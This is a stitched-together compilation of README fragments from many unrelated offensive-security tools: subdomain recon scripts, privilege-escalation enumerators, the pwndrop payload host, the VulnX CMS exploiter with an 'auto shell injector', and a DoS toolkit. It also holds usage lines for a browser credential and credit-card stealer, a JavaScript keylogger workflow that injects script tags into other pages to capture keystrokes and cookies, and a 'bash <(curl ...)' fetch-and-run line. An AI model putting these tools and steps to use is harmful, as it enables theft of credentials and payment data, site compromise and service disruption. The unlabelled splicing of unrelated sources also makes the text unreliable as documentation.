• domained tools: python3 domained.py --install
• Python required modules: sudo pip install -r ./ext/requirements.txt

• ldns library for DNS programming:
  • sudo apt-get install libldns-dev -y
• Go Programming Language:
  • sudo apt-get install golang

1. Sublist3r by Ahmed Aboul-Ela
2. enumall by Jason Haddix
3. Knock by Gianni Amato
4. Subbrute by TheRook
5. massdns by B. Blechschmidt
6. Recon-ng by Tim Tomes (LaNMaSteR53)
7. Amass by Jeff Foley (caffix)
8. SubFinder by by Ice3man543

• EyeWitness by ChrisTruncer
• SecList (DNS Recon List) by Daniel Miessler
• LevelUp All.txt Subdomain List by Jason Haddix

First Step:
Install Required Python Modules: sudo pip install -r ./ext/requirements.txt
Install Tools: sudo python3 domained.py --install

Example 1: python3 domained.py -d example.com
Uses subdomain example.com (Sublist3r (+subbrute), enumall, Knock, Amass, and SubFinder)

Example 2: python3 domained.py -d example.com -b -p --vpn
Uses subdomain example.com with seclist subdomain list bruteforcing (massdns, subbrute, Sublist3r, Amass, enumall, and SubFinder), adds ports 8443/8080 and checks if on VPN

Example 3: python3 domained.py -d example.com -b --bruteall
Uses subdomain example.com with large-all.txt bruteforcing (massdns, subbrute, Sublist3r, Amass, enumall and SubFinder)

Example 4: python3 domained.py -d example.com --quick
Uses subdomain example.com and only Amass and SubFinder

Example 5: python3 dom   ained.py -d example.com --quick --notify
Uses subdomain example.com, only Amass and SubFinder and notification

Example 6: python3 domained.py -d example.com --noeyewitness
Uses subdomain example.com with no EyeWitness

Note: --bruteall must be used with the -b flag

• Complete the ext/notifycfg.ini for Pushover or Gmail notifications. (Enable must be set to True)
• Please see the Pushover API info here and instructions on how to allow less secure apps on your gmail account here

• Multiple Domains
• Notifications
• Subdomains from censys
• Subdomains from Shodan
• Web Frontend/Dashboard
• Add SubFinder

• ccsplit - Multiple code improvements including the ability to run domained from any directory
• jafoca - Massdns fix
• mortymorty - SecList brute file fix
• Chan9390 - Updates to the requirements.txt
• dainok - Python 3.6+ fixes
• Apoorv Raj Saxena - Added SubFinder

• 07-15-2017: Updated to include error handling and updated reconnaissance techniques from Bugcrowd's LevelUp Conference (including subbrute/masscan and subdomain lists) - influenced by Jason Haddix's talk Bug Hunter's Methodology 2.0
• 08-09-2017: Various fixes (+ phantomjs error), added --fresh option, removed redundant PyBrute folder from output and added pip requirements.txt
• 08-15-2017: Added notification (--notify) option with Pushover or Gmail support
• 08-18-2017: Moved repo from OrOneEqualsOne/reconned
• 09-28-2017: Updated for Recon-ng dependency + Python3 changes
• 06-20-2018: Added Amass and option for no EyeWitness
• 10-12-2018: Added SubFinder

• 5 different enumeration scripts, including:
  • linux-smart-enumeration
  • LinEnum
  • linuxprivchecker.py
  • uptux
  • SUID3NUM
• 2 different exploit suggestion tools, including:
  • linux-soft-exploit-suggester
  • LES: Linux privilege escalationauditing tool
• Builtin webserver for hosting tools and uploading completed reports
• Automatic tool download and update feature
• Custom directory option, for when you know you have access to a specific directory (default is /tmp)
• Interactive menu lets you choose whether to run only enumeration, only expoit suggestion, or both
• Checks for Python 2 and 3 and lets you know which scripts will be skipped if Python is missing

./htbenum.sh [-u] -i IP -p port [-o directory] [-w] [-r]

Example:
         Host machine: root@kali:~/htbenum# ./htbenum.sh -u
         Host machine: root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
         Victim machine: www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
         Victim machine: www-data@victim:/tmp$ chmod +x ./htbenum.sh
         Victim machine: www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

 Parameters:
         -h - View help and usage.
         -i IP - IP address of the listening web server used for upload and download.
         -p port - TCP port of the listening web server used for upload and download.
         -o directory - Custom download and report creation directory (default is /tmp).
         -w - Start builtin web server for downloading files and uploading reports.
         -u - Update to the latest versions of each tool, overwriting any existing version   s.
         -r - Upload reports back to the host machine web server (must support PUT requests).

root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum#  ./htbenum.sh -u
_   _ ___________ _____ _   _ _   ____  ___
| | | |_   _| ___ \  ___| \ | | | | |  \/  |
| |_| | | | | |_/ / |__ |  \| | | | | .  . |
|  _  | | | | ___ \  __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\  | |_| | |  | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_|  |_/

By Solomon Sklash - solomonsklash@0xfeed.io 

[i] Updating all tools...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:   56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] Update complete!
root@kali:~/htbenum#  

root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w

www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

• Slides from ZeroNights 2019
• Demo 1 - X32-64, Edge, rop-gadgets from pwnjs
• Demo 2 - ARM64, checkm8 callback-chain

1. Put the file crauEmu.py in same location as uEmu.py.
2. Use File / Script file... or ALT+F7 in IDA to load crauEmu.py

• cURL
• Wget
• Python Request
• Perl LWP
• PHP HTTP_Request2
• Go Native
• NodeJS Request
• jQuery AJAX
• PowerShell

• Jython>= 2.7.1

• Proxy > Intercept
• Proxy > HTTP history
• Target > Site map
• Repeater

• More snippets

1. NOTE: I have noticed that there is an issue where System Preferences won't show an allow button. I assume this is some internal issue Apple needs to workout. Clicking back to System Preferences and navigating forward again seems to fix the issue.

csrutil disable
nvram boot-args="amfi_get_out_of_my_way=0x1"

systemextensionsctl developer on

• Simple and Handy utility to query DNS records.

dnsprobe -h

GO111MODULE=on go get -u -v github.com/projectdiscovery/dnsprobe  

GO111MODULE=on go get -u -v github.com/projectdiscovery/dnsprobe

> cat domains.txt | dnsprobe

root@test:~# cat bc.txt | dnsprobe
bounce.bugcrowd.com 192.28.152.174
blog.bugcrowd.com 104.20.4.239
blog.bugcrowd.com 104.20.5.239
www.bugcrowd.com 104.20.5.239
www.bugcrowd.com 104.20.4.239
events.bugcrowd.com 54.84.134.174

> dnsprobe -l domains.txt -r CNAME

root@test:~# dnsprobe -l bc.txt -r CNAME
forum.bugcrowd.com bugcrowd.hosted-by-discourse.com.
collateral.bugcrowd.com bugcrowd.outrch.com.
go.bugcrowd.com mkto-ab270028.com.
ww2.bugcrowd.com bugcrowdinc.mktoweb.com.
researcherdocs.bugcrowd.com ssl.readmessl.com.
docs.bugcrowd.com ssl.readmessl.com.

• Upload and immediately share multiple files using your own private VPS, using drag & drop.
• Decide to make files available or unavailable for download with a single click.
• Set up custom download URLs, for shared files, without playing with directory structure.
• Set up facade files, which will be served instead of the original file whenever you feel like it.
• Set up automatic redirects to spoof the file's extension in a shared link.
• Change MIME type of the served file to change browser's behavior when a download link is clicked.
• Serve files over HTTP, HTTPS and WebDAV.
• Install and setup everything using a bash oneliner.
• Set up pwndrop to work as a nameserver and respond with a valid DNS A record to any sub-domain you choose.
• Protect your admin panel behind a custom secret URL path and log in securely with your own username and password.
• Never worry about setting up HTTPS certificates as pwndrop does everything for you in the background (including auto-renewals).

1. Registered domain name pointing to pwndrop instance IP as a DNS A records or as a nameserver.
2. Server with at least 512 MB RAM.

curl https://raw.githubusercontent.com/kgretzky/pwndrop/master/install_linux.sh | sudo bash

tar zxvf pwndrop-linux-amd64.tar.gz
./pwndrop stop
./pwndrop install
./pwndrop start
./pwndrop status

git clone https://github.com/kgretzky/pwndrop
cd pwndrop
make
make install

1. Open the secret URL to authorize your browser: https://yourdomain.com/pwndrop (this is a default value; make sure to use the secret path, you've pre-configured)
2. Open the admin panel URL in your browser: https://yourdomain.com/ (since you've authorized your browser, you will now see an admin panel login page)
3. Create your admin account or login.
4. Click the configuration cog in top-left corner and make sure you change the secret path to something other than /pwndrop.

usage: pwndrop [start|stop|install|remove|status] [-config <config_path>] [-debug] [-no-autocert] [-no-dns] [-h]

daemon management:
    start           : start the daemon
    stop            : stop the daemon
    install         : install the daemon using the available system manager (systemd, systemv and upstart supported)
    remove          : uninstall the daemon
    status          : check status of the installed daemon

parameters:
    -config         : specify a custom path to a config file (def. 'pwndrop.ini' in same directory as the executable)
    -debug          : enable debug output 
    -no-autocert    : disable automatic TLS certificate retrieval from LetsEncrypt; useful when you want to connect over IP or/and in a local network
    -no-dns         : do not run a DNS server on port 53 UDP; use this if you don't want to use pwndrop as a nameserver
    -h              : usage help

[pwndrop]
listen_ip = "190.33.86.22"                  # the external IP of your pwndrop instance (must be set if you want to use the nameserver feature)
http_port = 80                              # listening port for HTTP and WebDAV
https_port = 443                            # listening port for HTTPS
data_dir = "./data"                         # directory path where data storage will reside (relative paths are from executable directory path)
admin_dir = "./admin"                       # directory path where the admin panel files reside (relative paths are from executable directory path)

[setup]                                     # optional: put in if you want to pre-configure pwndrop (section will be deleted from the config file on first run)
username = "admin"                          # username of the admin account
password = "secretpassword"                 # password of the admin account
redirect_url = "https://www.somedomai   n.com" # URL to which visitors will be redirected to if they supply a path, which doesn't point to any shared file (put blank if you want to return 404)
secret_path = "/pwndrop"                    # secret URL path, which upon visiting will allow your browser to access the login page of the admin panel (make sure to change the default value)

• Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz
  
• WinPEAS - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)
  
• Check the Local Linux Privilege Escalation checklist from book.hacktricks.xyz
  
• LinPEAS - Linux local Privilege Escalation Awesome Script (.sh)

usage: RS256_2_HS256_JWT.py [-h] payload pubkey

positional arguments:
  payload     JSON payload from JWT to attack
  pubkey      Public key file to use for signing

optional arguments:
  -h, --help  show this help message and exit

GO sandbox to run untrusted code.

Usage of ./gobox:

  gobox [FLAGS] command

  flags:
    -h Print Usage.
    -n value
        A glob pattern for automatically blocking file reads.
    -y value
        A glob pattern for automatically allowing file reads.

> gobox -n "/etc/password.txt" npm install sketchy-module

  BLOCKED READ on /etc/password.txt

> gobox -n "/etc/password.txt" bash <(curl  https://danger.zone/install.sh)

  BLOCKED READ on /etc/password.txt

> gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]

• Detects cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
• Target informations gatherings
• Target Subdomains gathering
• Multi-threading on demand
• Checks for vulnerabilities
• Auto shell injector
• Exploit dork searcher
• Ports Scan High Level
• Dns-Servers Dump
• Input multiple target to scan.
• Dorks Listing by Name& by ExploitName.
• Export multiple target from Dorks into a logfile.

• Com Jce
• Com Jwallpapers
• Com Jdownloads
• Com Jdownloads2
• Com Weblinks
• Com Fabrik
• Com Fabrik2
• Com Jdownloads Index
• Com Foxcontact
• Com Blog
• Com Users
• Com Ads Manager
• Com Sexycontactform
• Com Media
• Mod_simplefileupload
• Com Facileforms
• Com Facileforms
• Com extplorer

• Simple Ads Manager
• InBoundio Marketing
• WPshop eCommerce
• Synoptic
• Showbiz Pro
• Job Manager
• Formcraft
• PowerZoom
• Download Manager
• CherryFramework
• Catpro
• Blaze SlideShow
• Wysija-Newsletters

• Add Admin
• Drupal BruteForcer
• Drupal Geddon2

• attributewizardpro
• columnadverts
• soopamobile
• pk_flexmenu
• pk_vertflexmenu
• nvn_export_orders
• megamenu
• tdpsthemeoptionpanel
• psmodthemeoptionpanel
• masseditproduct
• blocktestimonial
• soopabanners
• Vtermslideshow
• simpleslideshow
• productpageadverts
• homepageadvertise
• homepageadvertise2
• jro_homepageadvertise
• advancedslider
• cartabandonmentpro
• cartabandonmentproOld
• videostab
• wg24themeadministration
• fieldvmegamenu
• wdoptionpanel

• Opencart BruteForce

usage: vulnx [options]

  -u --url              url target
  -D --dorks            search webs with dorks
  -o --output           specify output directory
  -t --timeout          http requests timeout
  -c --cms-info         search cms info[themes,plugins,user,version..]
  -e --exploit          searching vulnerability& run exploits
  -w --web-info         web informations gathering
  -d --domain-info      subdomains informations gathering
  -l, --dork-list       list names of dorks exploits
  -n, --number-page     number page of search engine(Google)
  -p, --ports           ports to scan
  -i, --input           specify domains to scan from an input file 
  --threads             number of threads
  --dns                 dns informations gathering

$ git clone https://github.com/anouarbensaad/VulnX.git
$ cd VulnX
$ docker build -t vulnx ./docker/
$ docker run -it --name vulnx vulnx:latest -u http://example.com

$ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com

VOLUME [ "$PATH" ]

$ git clone https://github.com/anouarbensaad/vulnx.git
$ cd VulnX
$ chmod +x install.sh
$ ./install.sh

$ pkg update
$ pkg install -y git
$ git clone http://github.com/anouarbensaad/vulnx
$ cd vulnx
$ chmod +x install.sh
$ ./install.sh

• click here to download vulnx
• download and install python3
• unzip vulnx-master.zip in c:/
• open the command prompt cmd.

> cd c:/vulnx-master
> python vulnx.py

• v1.9
• v1.8
• v1.7
• v1.6
• v1.5
• v1.4
• v1.3
• v1.2
• v1.1

• Report bugs & add issues
• Search for new vulnerability
• Develop plugins
• Searching Exploits
• Give suggestions (Ideas) to make it better

Modern javascript keylogger with web panel

• Keylogger
• Cookies
• Location
• Remote IP
• User-Agents

• Upload files from server directory to you server
• Change default username, password in flux.php
• Go to http://you.host/flux.php
• Click build
• Now inject script tag to other documents

$ pip install git+git://github.com/jqueguiner/lk_scraper

$ docker-compose up -d
$ docker-compose run lk_scraper python3

$ docker run -d -p 4444:4444 --shm-size 2g selenium/standalone-firefox:3.141.59-20200326

Navigate to Linkedin.com and log in
Open up the browser developer tools (Ctrl-Shift-I or right click -> inspect element)

Select the Application tab
Under the Storage header on the left-hand menu, click the Cookies dropdown and select www.linkedin.com
Find the li_at cookie, and double click the value to select it before copying

Select Storage tab
Click the Cookies dropdown and select www.linkedin.com
Find and copy the li_at value

from lk_scraper import Scraper
li_at = "My_super_linkedin_cookie"
scraper = Scraper(li_at=li_at)

$ export LI_AT="My_super_linkedin_cookie"

from lk_scraper import Scraper
scraper = Scraper()

from lk_scraper import Scraper
scraper = Scraper()
company = scraper.get_object(object_name='company', object_id='apple')

from lk_scraper import Scraper
scraper = Scraper()
profil = scraper.get_object(object_name='profil', object_id='jlqueguiner')

Stealer.exe PASSWORDS

Stealer.exe CREDIT_CARDS

Stealer.exe HISTORY

Stealer.exe BOOKMARKS

Stealer.exe COOKIES

• Google Chrome
• Opera
• Chromium
• Brave-Browser
• Epic Privacy Browser
• Amigo
• Vivaldi
• Orbitum
• Atom
• Kometa
• Comodo Dragon
• Torch
• Slimjet
• 360Browser
• Maxthon3
• K-Melon
• Sputnik
• Nichrome
• CocCoc Browser
• Uran
• Chromodo
• Yandex (old)

$ httpgrep -H

--==[ httpgrep by nullsecurity.net ]==--

usage

  httpgrep -h <args> -s <arg> [opts] | <misc>

opts

  -h <hosts|file>   - single host or host-range/cidr-range or file containing
                      hosts, e.g.: foobar.net, 192.168.0.1-192.168.0.254,
                      192.168.0.0/24, /tmp/hosts.txt
  -p <port>         - port to connect to (default: 80)
  -t                - use TLS/SSL to connect to service
  -u <URI>          - URI to search given strings in, e.g.: /foobar/, /foo.html
                      (default /)
  -s <string|file>  - a single string or multile strings in a file to find in
                      given URIs, e.g. 'tomcat 8', '/tmp/igot0daysforthese.txt'
  -b <bytes>        - num bytes to read from response. offset == response[0].
                      (default: 64)
  -x <threads>      - num thre   ads for concurrent checks (default: 50)
  -c <seconds>      - num seconds for socket timeout (default: 2.5)
  -i                - use case-insensitive search
  -v                - verbose mode (default: quiet)

misc

  -H                - print help
  -V                - print version information

• quick'n'dirty code
• httpgrep is already packaged and available for BlackArch Linux
• My master-branches are always stable; dev-branches are created for current work.
• All of my public stuff you find are officially announced and published via nullsecurity.net.

git clone https://github.com/atmoner/githubFind3r.git
cd githubFind3r
npm install

node githubFind3r.js

[ hacker@blackarch ~ ]$ nullscan -H
                ____
   ____  __  __/ / /_____________ _____
  / __ \/ / / / / / ___/ ___/ __ `/ __ \
 / / / / /_/ / / (__  ) /__/ /_/ / / / /
/_/ /_/\__,_/_/_/____/\___/\__,_/_/ /_/

   --==[ by nullsecurity.net ]==--

usage

  nullscan <modes> [options] | <misc>

modes

  -t <targets> - hosts to scan via nmap and then attack - ? for info
  -u <uris>    - targets to attack directly via URIs - ? for info
  -l <file>    - parse nmap xml logfile and attack hosts on open ports

options

  -o <opts>    - extra options for modes - ? for info
  -i <mods>    - include modules (default: all) - ? for info
  -I <tools>   - include tools (default: all) - ? for info
  -x <mods>    - exclude modules (default: see nullscan.cfg) - ? for info
  -X <tools>   - exclude tools (default: see nullscan.   cfg) - ? for info
  -T <num>     - num workers for parallel target checks (default: 15)
  -M <num>     - num workers to run parallel modules (default: 10)
  -P <num>     - num workers to run parallel tools (default: 15)
  -k <sec>     - num seconds for tool (global) timeout (default: 0.0)
  -r           - generate an html report
  -R <dir>     - work, log and report dir (default: pwd + date)
  -c <file>    - config file (default: /etc/nullscan.conf)
  -v           - verbose mode (default: false)
  -d           - debug mode (default: false)

misc

  -C           - check for missing tools (recommended)
  -p <args>    - print tools and exit - ? for info
  -m <args>    - create and add a new module - ? for info
  -a <args>    - add tool to existing module - ? for info
  -V           - print version of nullscan and exit
  -H           - print this help and exit

examples

  -t 192.168.0.0/24 -i tcp=ssh,http -r -I hydra_ssh,crack_http_auth

  -u 'tcp://nsa.gov:80=http,22=ssh;udp://foo.bar:1337;
      http://fbi.gov,https://cia.gov;mail://foo@bar.baz;
      person://justin bieber,noptrix;lan://eth0,tap0;wifi://wlan0'
      -o 'user=root;plists=/tmp/pwds.txt;rhost=192.168.0.1;
      sport=1337;dirsearch_web=-o my -p "own opts" -c 1 -f 4;'

  -n /tmp/scanned.xml -i 'host=icmp;tcp=default' -r

  -l hosts.txt -X sqlmap,wpscan -v -o 'httping_web=-p cia.gov;
     rpcdump_udp=-f foo -b bar;nmap=-sT,-n,-p-;'

  -p 'tcp=ssh,http;host=zonetransfer;udp'

  -m 'icmp/ping ping_flood ping -f -s 9999'

  -a 'tcp/ssh crack_ssh sshcracker -c arg -f arg'

• Please check the manpage from docs/nullscan.1
• Use '?' option-value for any cmdline options. It gives you information for usage and examples.
• clean code; real project
• nullscan is already packaged and available for BlackArch Linux
• My master-branches are always stable; dev-branches are created for current work.
• All of my public stuff you find are officially announced and published via nullsecurity.net.

Modern Denial-of-service ToolKit

• Windows:
  
  • Download Python 3.6 from here
  • Launch installer, click add python to PATH
  • Download Impulse
  • Open cmd or powershell in Impulse directory
  • Run this command: pip install -r requirements.txt
  • And this: python impulse.py --help
• Linux/Termux:
  
  • sudo apt update
  • sudo apt install python python-pip git -y
  • git clone https://github.com/LimerBoy/Impulse
  • cd Impulse/
  • pip install -r requirements.txt
  • python impulse.py --help

$ lulzbuster -H
    __      __      __               __
   / /_  __/ /___  / /_  __  _______/ /____  _____
  / / / / / /_  / / __ \/ / / / ___/ __/ _ \/ ___/
 / / /_/ / / / /_/ /_/ / /_/ (__  ) /_/  __/ /
/_/\__,_/_/ /___/_.___/\__,_/____/\__/\___/_/

        --==[ by nullsecurity.net ] ==--

usage

  lulzbuster -s <arg> [opts] | <misc>

target options

  -s <url>       - start url to begin scan with

http options

  -h <type>      - http request type (default: GET) - ? to list types
  -x <code>      - exclude http status codes (default: 400,404,500,501,502,503
                   multi codes separated by ',')
  -f             - follow http redirects. hint: better try appending a '/'
                   with '-A' option first instead of using '-f'
  -F <num>       - num level to follow http redirects (default: 0)
  -u <str>       - use   r-agent string (default: built-in windows firefox)
  -U             - use random built-in user-agents
  -c <str>       - pass custom header(s) (e.g. 'Cookie: foo=bar; lol=lulz')
  -a <creds>     - http auth credentials (format: <user>:<pass>)
  -r             - turn on auto update referrer
  -j <num>       - define http version (default: curl's default) - ? to list

timeout options

  -D <num>       - num seconds for delay between requests (default: 0)
  -C <num>       - num seconds for connect timeout (default: 10)
  -R <num>       - num seconds for request timeout (default: 30)
  -T <num>       - num seconds to give up and exit lulzbuster completely
                   (default: none)

tuning options

  -t <num>       - num threads for concurrent scanning (default: 30)
  -g <num>       - num connection cache size for curl (default: 30)
                   note: this value should always equal to -t's value

other options

  -w <file>      - wordlist file
                   (default: /usr/local/share/lulzbuster/lists/medium.txt)
  -A <str>       - append any words separated by comma (e.g. '/,.php,~bak)
  -p <addr>      - proxy address (format: <scheme>://<host>:<port>) - ? to
                   list supported schemes
  -P <creds>     - proxy auth credentials (format: <user>:<pass>)
  -i             - insecure mode (skips ssl/tls cert verification)
  -S             - smart mode aka eliminate false-positives, more infos,
                   et   c. (use this if speed is not your 1st priority!)
  -n <str>       - nameservers (default: '1.1.1.1,8.8.8.8,208.67.222.222'
                   multi separated by '.')
  -l <file>      - log found paths and valid urls to file

misc

  -X             - print built-in user-agents
  -V             - print version of lulzbuster and exit
  -H             - print this help and exit

• clean code; real project
• lulzbuster is already packaged and available for BlackArch Linux
• My master-branches are always stable; dev-branches are created for current work.
• All of my public stuff you find are officially announced and published via nullsecurity.net.